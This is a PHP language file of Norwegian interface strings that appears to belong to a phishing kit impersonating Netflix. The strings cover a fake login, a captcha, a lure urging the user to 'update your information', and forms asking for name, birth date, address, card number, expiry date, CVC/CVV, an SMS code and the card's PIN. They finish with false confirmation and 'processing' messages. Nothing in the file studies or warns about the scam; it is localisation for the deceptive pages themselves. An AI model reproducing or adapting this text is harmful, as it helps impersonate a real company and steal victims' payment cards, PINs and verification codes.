<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "no",
        "xcapt" => "Vennligst ta deg tid til å løse hCaptcha nedenfor. Dette hjelper oss med å forsikre oss om at du er en ekte bruker og ikke en bot, og gir en sikker miljø for alle.",
        "xcapt1" => "Vennligst kryss av i CAPTCHA-boksen.",
        "xcapt2" => "Verifisering",
        "xcapt3" => "Fortsett",
        "xmain1" => "Logg inn",
        "xmain2" => "E-post eller telefonnummer",
        "xmain3" => "Vennligst skriv inn en gyldig e-postadresse eller telefonnummer.",
        "xmain4" => "Passord",
        "xmain5" => "Passordet ditt må inneholde mellom 4 og 60 tegn.",
        "xmain6" => "Logg inn",
        "xmain7" => "Husk meg",
        "xmain8" => "Trenger du hjelp?",
        "xmain9" => "Ny på Netflix?",
        "xmain10" => " Registrer deg nå.",
        "xmain11" => "Denne siden er beskyttet av Google reCAPTCHA for å sikre at du ikke er en robot.",
        "xmain12" => "Les mer.",
        "xinfoz1" => "Personlig informasjon",
        "xinfoz2" => "Fornavn og etternavn",
        "xinfoz3" => "Dette feltet er obligatorisk.",
        "xinfoz4" => "Fødselsdato",
        "xinfoz5" => "Adresse",
        "xinfoz6" => "By",
        "xinfoz7" => "Postnummer",
        "xinfoz8" => "E-postadresse",
        "xinfoz9" => "Telefonnummer",
        "xinfoz10" => "Feltene i dette skjemaet er påkrevd, da vi trenger denne informasjonen for å behandle forespørselen din.",
        "xinfoz11" => "Fortsett",
        "xpay1" => "Konfigurer betalingskortet ditt",
        "xpay2" => "Kortnummer",
        "xpay3" => "Kortnummer påkrevd.",
        "xpay4" => "Utløpsdato",
        "xpay5" => "Utløpsdato påkrevd.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV påkrevd.",
        "xpay8" => "Ende-til-ende kryptert",
        "xpay9" => "Fortsett",
        "xsms1" => "Verifisering",
        "xsms2" => "Av sikkerhetsgrunner må vi forsikre oss om at det virkelig er deg.",
        "xsms3" => "Vi vil sende deg en SMS med en sikkerhetskoden",
        "xsms4" => "Vennligst skriv inn den mottatte koden",
        "xsms5" => "SMS-kode",
        "xsms6" => "Ugyldig SMS-kode",
        "xsms7" => "Dette trinnet er nødvendig for å behandle forespørselen din sikkert.",
        "xsms8" => "Fortsett",
        "xpin1" => "Verifisering",
        "xpin2" => "Av sikkerhetsgrunner må vi forsikre oss om at det virkelig er deg.",
        "xpin3" => "Vi vil sende deg en SMS med en sikkerhetskoden",
        "xpin4" => "Vennligst skriv inn PIN-koden til kortet ditt",
        "xpin5" => "PIN-kode",
        "xpin6" => "Ugyldig PIN-kode",
        "xpin7" => "Dette trinnet er nødvendig for å behandle forespørselen din sikkert.",
        "xpin8" => "Fortsett",
        "xexpl1" => "Oppdatering",
        "xexpl2" => "Vi håper denne kommunikasjonen finner deg vel. Vi ønsker å informere deg om at det er essensielt å oppdatere informasjonen din på plattformen vår for å sikre en kontinuerlig og sikker brukeropplevelse.",
        "xexpl3" => "For å forbedre tjenestene våre og sikre kontoens sikkerhet, ber vi deg ta deg tid til å oppdatere informasjonen din.",
        "xexpl4" => "Fortsett",
        "xconf1" => "Bekreftelse",
        "xconf2" => "Vi takker deg oppriktig for at du tok deg tid til å oppdatere informasjonen din på plattformen vår. Ditt engasjement for sikkerheten og nøyaktigheten av kontodetaljene dine er avgjørende for oss.",
        "xconf3" => "Endringene dine er blitt lagret med suksess. Du kan nå fullt ut nyte plattformen vår med de nyeste og oppdaterte opplysningene.",
        "xconf4" => "Fortsett",
        "xload1" => "Behandling pågår...",
        "xload2" => "Ikke forlat denne siden.",
        "xfoot1" => "Spørsmål? Kontakt oss.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Hjelpesenter",
        "xfoot4" => "Bruksvilkår",
        "xfoot5" => "Personvern",
        "xfoot6" => "Informasjonskapselinnstillinger",
        "xfoot7" => "Bedriftsinformasjon",
        "xfoot8" => "Norsk"
    );

    return $lang[$phrase];
}
?>
